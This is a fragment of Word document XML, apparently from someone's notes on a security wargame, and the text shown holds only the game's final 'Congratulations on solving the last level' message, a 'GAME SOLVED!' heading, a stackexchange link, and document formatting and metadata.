          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00456D2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Congratulations on solving the last level of this game!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAEEC8" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00456D2D" w:rsidRDefault="001856B0" w:rsidP="001856B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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A728CD" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00F449DE" w:rsidRDefault="001856B0" w:rsidP="001856B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F449DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At this moment, there are no more levels to play in this game. However, we are constantly working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD51884" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00F449DE" w:rsidRDefault="001856B0" w:rsidP="001856B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F449DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on new levels and will most likely expand this game with more levels soon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A43D7" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00F449DE" w:rsidRDefault="001856B0" w:rsidP="001856B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F449DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep an eye out for an announcement on our usual communication channels!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A95850" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00F449DE" w:rsidRDefault="001856B0" w:rsidP="001856B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F449DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In the meantime, you could play some of our other wargames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ADBA4B" w14:textId="77777777" w:rsidR="001856B0" w:rsidRPr="00F449DE" w:rsidRDefault="001856B0" w:rsidP="001856B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270728AF" w14:textId="50A888AA" w:rsidR="001856B0" w:rsidRDefault="001856B0" w:rsidP="001856B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  <w:r w:rsidRPr="00F449DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If you have an idea for an awesome new level, please let us know!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8FBC0B" w14:textId="612DED7A" w:rsidR="00F64595" w:rsidRDefault="00F64595" w:rsidP="001856B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39FC4859" w14:textId="48AD906A" w:rsidR="00F64595" w:rsidRDefault="00F64595" w:rsidP="001856B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458A1078" w14:textId="77777777" w:rsidR="00820F7C" w:rsidRDefault="00820F7C" w:rsidP="001856B0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inorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558C11D2" w14:textId="3A66C9A0" w:rsidR="00F64595" w:rsidRPr="00F64595" w:rsidRDefault="00F64595" w:rsidP="00F645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eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C0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64595">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C0000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AME SOLVED!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F64595" w:rsidRPr="00F64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61F46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E70423CE"/>
    <w:lvl w:ilvl="0" w:tplc="6B923B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E9"/>
    <w:rsid w:val="00003766"/>
    <w:rsid w:val="00023691"/>
    <w:rsid w:val="00040DEC"/>
    <w:rsid w:val="000756E4"/>
    <w:rsid w:val="000771E4"/>
    <w:rsid w:val="000802C0"/>
    <w:rsid w:val="0009694D"/>
    <w:rsid w:val="000975D5"/>
    <w:rsid w:val="000B3EF4"/>
    <w:rsid w:val="000C0860"/>
    <w:rsid w:val="000C7309"/>
    <w:rsid w:val="000C75D1"/>
    <w:rsid w:val="000D2A7B"/>
    <w:rsid w:val="000F5089"/>
    <w:rsid w:val="000F75D4"/>
    <w:rsid w:val="00100417"/>
    <w:rsid w:val="00102805"/>
    <w:rsid w:val="00105E75"/>
    <w:rsid w:val="001250FA"/>
    <w:rsid w:val="001332B4"/>
    <w:rsid w:val="00143315"/>
    <w:rsid w:val="00161898"/>
    <w:rsid w:val="00175DDC"/>
    <w:rsid w:val="001801F3"/>
    <w:rsid w:val="001856B0"/>
    <w:rsid w:val="001939B5"/>
    <w:rsid w:val="001961C0"/>
    <w:rsid w:val="00197450"/>
    <w:rsid w:val="001A2089"/>
    <w:rsid w:val="001A26D6"/>
    <w:rsid w:val="001A52E9"/>
    <w:rsid w:val="001A54A7"/>
    <w:rsid w:val="001A7C79"/>
    <w:rsid w:val="001B26F8"/>
    <w:rsid w:val="001C575D"/>
    <w:rsid w:val="001D2C8A"/>
    <w:rsid w:val="001E43F7"/>
    <w:rsid w:val="001E4CCE"/>
    <w:rsid w:val="001E72B7"/>
    <w:rsid w:val="001F4A1A"/>
    <w:rsid w:val="002052A7"/>
    <w:rsid w:val="00210C01"/>
    <w:rsid w:val="0021576A"/>
    <w:rsid w:val="00220AC5"/>
    <w:rsid w:val="00226053"/>
    <w:rsid w:val="00230415"/>
    <w:rsid w:val="00253A22"/>
    <w:rsid w:val="00263638"/>
    <w:rsid w:val="002662D2"/>
    <w:rsid w:val="002712DF"/>
    <w:rsid w:val="002806B6"/>
    <w:rsid w:val="00284403"/>
    <w:rsid w:val="00286B0D"/>
    <w:rsid w:val="00290C12"/>
    <w:rsid w:val="00295AE0"/>
    <w:rsid w:val="002A4271"/>
    <w:rsid w:val="002D1D9D"/>
    <w:rsid w:val="002D1F81"/>
    <w:rsid w:val="002D5421"/>
    <w:rsid w:val="002E0545"/>
    <w:rsid w:val="002E2411"/>
    <w:rsid w:val="0030771F"/>
    <w:rsid w:val="00320DBF"/>
    <w:rsid w:val="00326CF9"/>
    <w:rsid w:val="003407B9"/>
    <w:rsid w:val="0035189D"/>
    <w:rsid w:val="00354787"/>
    <w:rsid w:val="00356B01"/>
    <w:rsid w:val="00361B1E"/>
    <w:rsid w:val="00364A17"/>
    <w:rsid w:val="00372486"/>
    <w:rsid w:val="0037317B"/>
    <w:rsid w:val="003741CE"/>
    <w:rsid w:val="00374CBB"/>
    <w:rsid w:val="00376147"/>
    <w:rsid w:val="003A0D1C"/>
    <w:rsid w:val="003A5C7D"/>
    <w:rsid w:val="003D0271"/>
    <w:rsid w:val="003D7113"/>
    <w:rsid w:val="003D731E"/>
    <w:rsid w:val="003E5494"/>
    <w:rsid w:val="00403B7A"/>
    <w:rsid w:val="0041465A"/>
    <w:rsid w:val="004202AE"/>
    <w:rsid w:val="00424FB8"/>
    <w:rsid w:val="004315E9"/>
    <w:rsid w:val="00446235"/>
    <w:rsid w:val="0045026C"/>
    <w:rsid w:val="0045291E"/>
    <w:rsid w:val="00453EBE"/>
    <w:rsid w:val="00456D2D"/>
    <w:rsid w:val="0046200B"/>
    <w:rsid w:val="00470498"/>
    <w:rsid w:val="004711DF"/>
    <w:rsid w:val="004763F3"/>
    <w:rsid w:val="00481682"/>
    <w:rsid w:val="004A2F2E"/>
    <w:rsid w:val="004A3174"/>
    <w:rsid w:val="004B51F4"/>
    <w:rsid w:val="004B5386"/>
    <w:rsid w:val="004B7B95"/>
    <w:rsid w:val="004C0F5F"/>
    <w:rsid w:val="004C2087"/>
    <w:rsid w:val="004C6A31"/>
    <w:rsid w:val="004D0B9D"/>
    <w:rsid w:val="004E27F3"/>
    <w:rsid w:val="004E5655"/>
    <w:rsid w:val="004F2D5D"/>
    <w:rsid w:val="00501DCD"/>
    <w:rsid w:val="00505503"/>
    <w:rsid w:val="00510A4D"/>
    <w:rsid w:val="00521B1E"/>
    <w:rsid w:val="00523B53"/>
    <w:rsid w:val="00530858"/>
    <w:rsid w:val="00562A47"/>
    <w:rsid w:val="005718B8"/>
    <w:rsid w:val="00573697"/>
    <w:rsid w:val="00583DB6"/>
    <w:rsid w:val="00587AA6"/>
    <w:rsid w:val="005910C6"/>
    <w:rsid w:val="00591753"/>
    <w:rsid w:val="005A4A45"/>
    <w:rsid w:val="005B24EC"/>
    <w:rsid w:val="005C1040"/>
    <w:rsid w:val="005D6114"/>
    <w:rsid w:val="005D6A9C"/>
    <w:rsid w:val="005D754A"/>
    <w:rsid w:val="005F1B15"/>
    <w:rsid w:val="005F352A"/>
    <w:rsid w:val="005F6125"/>
    <w:rsid w:val="006007B3"/>
    <w:rsid w:val="00605C36"/>
    <w:rsid w:val="006157D1"/>
    <w:rsid w:val="00623D9C"/>
    <w:rsid w:val="0063585A"/>
    <w:rsid w:val="00640A06"/>
    <w:rsid w:val="00652D2E"/>
    <w:rsid w:val="00672FA6"/>
    <w:rsid w:val="00690FED"/>
    <w:rsid w:val="00692C5C"/>
    <w:rsid w:val="0069353B"/>
    <w:rsid w:val="0069705A"/>
    <w:rsid w:val="006A313F"/>
    <w:rsid w:val="006A4945"/>
    <w:rsid w:val="006B12D1"/>
    <w:rsid w:val="006C3115"/>
    <w:rsid w:val="006C320F"/>
    <w:rsid w:val="006D28A3"/>
    <w:rsid w:val="006F3207"/>
    <w:rsid w:val="006F5CB2"/>
    <w:rsid w:val="00706142"/>
    <w:rsid w:val="007102E0"/>
    <w:rsid w:val="00715D90"/>
    <w:rsid w:val="007223A0"/>
    <w:rsid w:val="00726B74"/>
    <w:rsid w:val="00731DCE"/>
    <w:rsid w:val="007320D1"/>
    <w:rsid w:val="00771220"/>
    <w:rsid w:val="00787DE5"/>
    <w:rsid w:val="00794049"/>
    <w:rsid w:val="007A0667"/>
    <w:rsid w:val="007A6D6D"/>
    <w:rsid w:val="007C74CD"/>
    <w:rsid w:val="007E300B"/>
    <w:rsid w:val="00812122"/>
    <w:rsid w:val="00820F7C"/>
    <w:rsid w:val="008423A8"/>
    <w:rsid w:val="008432C5"/>
    <w:rsid w:val="00843523"/>
    <w:rsid w:val="00852289"/>
    <w:rsid w:val="008528E1"/>
    <w:rsid w:val="00864008"/>
    <w:rsid w:val="008721BE"/>
    <w:rsid w:val="00886E85"/>
    <w:rsid w:val="008A38EB"/>
    <w:rsid w:val="008B0ABC"/>
    <w:rsid w:val="008E0C69"/>
    <w:rsid w:val="008E784F"/>
    <w:rsid w:val="008F0977"/>
    <w:rsid w:val="0090014A"/>
    <w:rsid w:val="00907815"/>
    <w:rsid w:val="00915F49"/>
    <w:rsid w:val="00923084"/>
    <w:rsid w:val="00941C7D"/>
    <w:rsid w:val="0094290C"/>
    <w:rsid w:val="009509E1"/>
    <w:rsid w:val="00951F57"/>
    <w:rsid w:val="00952EA4"/>
    <w:rsid w:val="009561D2"/>
    <w:rsid w:val="00957E12"/>
    <w:rsid w:val="0096649D"/>
    <w:rsid w:val="00973CEE"/>
    <w:rsid w:val="00984B62"/>
    <w:rsid w:val="00997DD5"/>
    <w:rsid w:val="009A78FD"/>
    <w:rsid w:val="009C0D49"/>
    <w:rsid w:val="009C23E0"/>
    <w:rsid w:val="009C23E9"/>
    <w:rsid w:val="009D0635"/>
    <w:rsid w:val="009D7B0D"/>
    <w:rsid w:val="009E09D8"/>
    <w:rsid w:val="009E4155"/>
    <w:rsid w:val="009F28EF"/>
    <w:rsid w:val="009F4B44"/>
    <w:rsid w:val="009F4BFD"/>
    <w:rsid w:val="00A01145"/>
    <w:rsid w:val="00A20DFD"/>
    <w:rsid w:val="00A23521"/>
    <w:rsid w:val="00A41015"/>
    <w:rsid w:val="00A44469"/>
    <w:rsid w:val="00A45C3B"/>
    <w:rsid w:val="00A52858"/>
    <w:rsid w:val="00A57716"/>
    <w:rsid w:val="00A7545A"/>
    <w:rsid w:val="00A76146"/>
    <w:rsid w:val="00A80A93"/>
    <w:rsid w:val="00AA24FF"/>
    <w:rsid w:val="00AD3D02"/>
    <w:rsid w:val="00AD487F"/>
    <w:rsid w:val="00AE77F3"/>
    <w:rsid w:val="00B074DD"/>
    <w:rsid w:val="00B16A39"/>
    <w:rsid w:val="00B235BF"/>
    <w:rsid w:val="00B23E6F"/>
    <w:rsid w:val="00B24F82"/>
    <w:rsid w:val="00B25C20"/>
    <w:rsid w:val="00B36B81"/>
    <w:rsid w:val="00B432FE"/>
    <w:rsid w:val="00B67D13"/>
    <w:rsid w:val="00B759B7"/>
    <w:rsid w:val="00BA1DDC"/>
    <w:rsid w:val="00BA203A"/>
    <w:rsid w:val="00BA4E61"/>
    <w:rsid w:val="00BA5E3E"/>
    <w:rsid w:val="00BB609E"/>
    <w:rsid w:val="00BD1997"/>
    <w:rsid w:val="00BF3444"/>
    <w:rsid w:val="00BF5EEE"/>
    <w:rsid w:val="00C102AC"/>
    <w:rsid w:val="00C152CB"/>
    <w:rsid w:val="00C16E55"/>
    <w:rsid w:val="00C44167"/>
    <w:rsid w:val="00C45A81"/>
    <w:rsid w:val="00C625DD"/>
    <w:rsid w:val="00C63D11"/>
    <w:rsid w:val="00C72A14"/>
    <w:rsid w:val="00C7426E"/>
    <w:rsid w:val="00C75B95"/>
    <w:rsid w:val="00C76BA7"/>
    <w:rsid w:val="00CA0A4B"/>
    <w:rsid w:val="00CB33A7"/>
    <w:rsid w:val="00CB49F1"/>
    <w:rsid w:val="00CB5043"/>
    <w:rsid w:val="00CB6207"/>
    <w:rsid w:val="00CC431E"/>
    <w:rsid w:val="00CF5B53"/>
    <w:rsid w:val="00D05B6E"/>
    <w:rsid w:val="00D12D48"/>
    <w:rsid w:val="00D40119"/>
    <w:rsid w:val="00D5259E"/>
    <w:rsid w:val="00D63BE7"/>
    <w:rsid w:val="00D7247A"/>
    <w:rsid w:val="00D80701"/>
    <w:rsid w:val="00D94630"/>
    <w:rsid w:val="00DA1A2E"/>
    <w:rsid w:val="00DB09A0"/>
    <w:rsid w:val="00DB4A90"/>
    <w:rsid w:val="00DC1506"/>
    <w:rsid w:val="00DC4710"/>
    <w:rsid w:val="00DC74F9"/>
    <w:rsid w:val="00E233C2"/>
    <w:rsid w:val="00E2408C"/>
    <w:rsid w:val="00E255CC"/>
    <w:rsid w:val="00E30CCE"/>
    <w:rsid w:val="00E41437"/>
    <w:rsid w:val="00E80440"/>
    <w:rsid w:val="00E82E1D"/>
    <w:rsid w:val="00E83085"/>
    <w:rsid w:val="00E97F2D"/>
    <w:rsid w:val="00EA185D"/>
    <w:rsid w:val="00EA4BE8"/>
    <w:rsid w:val="00EB7CF0"/>
    <w:rsid w:val="00EC2C75"/>
    <w:rsid w:val="00ED3D59"/>
    <w:rsid w:val="00EE3D0D"/>
    <w:rsid w:val="00EF01A2"/>
    <w:rsid w:val="00EF0B58"/>
    <w:rsid w:val="00F01CCA"/>
    <w:rsid w:val="00F05BD0"/>
    <w:rsid w:val="00F07D29"/>
    <w:rsid w:val="00F26D51"/>
    <w:rsid w:val="00F304AC"/>
    <w:rsid w:val="00F35624"/>
    <w:rsid w:val="00F365D8"/>
    <w:rsid w:val="00F449DE"/>
    <w:rsid w:val="00F64595"/>
    <w:rsid w:val="00F70CE6"/>
    <w:rsid w:val="00F871D5"/>
    <w:rsid w:val="00FA54C1"/>
    <w:rsid w:val="00FD2052"/>
    <w:rsid w:val="00FD7ECD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21AE3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{010F2A6F-E349-4954-B85D-FEC9C1BF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D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D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3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280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0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0119"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="le">
    <w:name w:val="le"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0007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756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ROT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x.stackexchange.com/questions/16357/usage-of-dash-in-place-of-a-filena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F422-77DC-46C4-8A06-05CB0CD6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8</Pages>
  <Words>4891</Words>
  <Characters>2788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samuel</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>asaf samuel</cp:lastModifiedBy>
  <cp:revision>230</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-25T17:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-15T06:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>